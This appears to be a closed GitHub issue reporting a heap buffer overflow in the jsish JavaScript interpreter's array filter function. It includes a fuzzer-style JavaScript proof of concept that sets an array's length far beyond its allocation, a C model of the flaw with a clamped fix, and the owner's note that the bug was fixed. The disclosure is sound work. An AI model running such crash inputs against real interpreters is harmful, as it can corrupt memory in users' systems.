
buffer overflow #7

Closed
bird8693 opened this issue Apr 13, 2020 · 1 comment

@bird8693

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o.length = ~-2147483648; // ~-2147483648 === 2147483647: the length property now far exceeds the two allocated elements
o = o.reverse();
var a = Object.keys(o);
var pJZc = JSON.stringify('gA6MJqj19J?*JEEN');
pJZc = pJZc.slice(pJZc.length, pJZc.length);
pJZc = o.filter(function () {
}, 3037000498);
var GRPm = new RegExp('');
var NXPj = new RegExp('_IÁ\x80\xA7\t\x07ñ\xBB=MÙ%ÿ');
GRPm = o.indexOf(2147483647, function () {
});
JSON.stringify('Rmt(3oS<C?]+^J*uH0pR]');
o = a.slice(o, o);
var DYsj = new SharedArrayBuffer(2147483647);
var KweA = new Map([
    [
        0,
        1,
        o,
        673720360,
        o,
        a,
        o.length
    ],
    [
        a.length,
        42,
        a,
        -2147483648,
        a.length,
        -Infinity,
        o,
        1e-15
    ]
]);
var JXpp = JSON.stringify('\xA6\xB8løÚz\x1Cz\x81\x83ó\x9D;\xA9!ð\x8F\x87\xB3nZ');
var NRrA;
NRrA = o.toString(o);

vulnerability description:

The code that caused the vulnerability is at src/jsiArray.c:464, in the function jsi_ArrayFilterCmd; the code is as follows:
[image]
curlen is obtained by reading the length of the object obj, as shown in the figure:
[image]
Modify the length of obj in the PoC to a larger value, i.e.:
[image]
Then call o.filter to trigger jsish's jsi_ArrayFilterCmd function, which makes the curlen value larger and accesses heap space past the end of the obj->arr array.
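A minimal C model of the length/allocation mismatch described in this report, added here as an illustration and not taken from jsish (the JsArray struct, filter_checked and the other names are hypothetical): the script-visible length can be set far beyond the allocated element count, so a loop bound taken from length alone runs off the heap buffer, while clamping the bound to the allocated count does not.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical model of a JS array object (not jsish's real struct):
 * 'length' is the script-visible property, 'alloc' the number of
 * elements really backed by heap storage. Assigning a huge length in
 * script does not grow the backing store, so the two can diverge. */
typedef struct {
    int32_t *arr;     /* heap-backed elements */
    size_t   alloc;   /* elements actually allocated */
    uint32_t length;  /* script-controlled .length property */
} JsArray;

static JsArray make_array(const int32_t *vals, size_t n) {
    JsArray a = { malloc(n * sizeof *vals), n, (uint32_t)n };
    for (size_t i = 0; i < n; i++) a.arr[i] = vals[i];
    return a;
}

/* Models 'o.length = ~-2147483648': only the property changes. */
static void set_length_property(JsArray *a, uint32_t len) { a->length = len; }

/* Iteration bound derived from the object's length alone, as the reported
 * code does. Returned rather than looped over, so the gap between it and
 * 'alloc' can be inspected without performing an out-of-bounds read. */
static size_t unchecked_filter_bound(const JsArray *a) { return a->length; }

/* Hardened variant: clamp the loop bound to the allocated element count
 * before touching arr[]. Returns how many elements the predicate kept;
 * 'out' must hold at least a->alloc elements. */
static size_t filter_checked(const JsArray *a, bool (*keep)(int32_t), int32_t *out) {
    size_t bound = a->length < a->alloc ? a->length : a->alloc;
    size_t kept = 0;
    for (size_t i = 0; i < bound; i++)
        if (keep(a->arr[i])) out[kept++] = a->arr[i];
    return kept;
}

static bool is_even(int32_t v) { return v % 2 == 0; }
```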

@pcmacdon
Owner

This issue was resolved by the fix to issue #5.
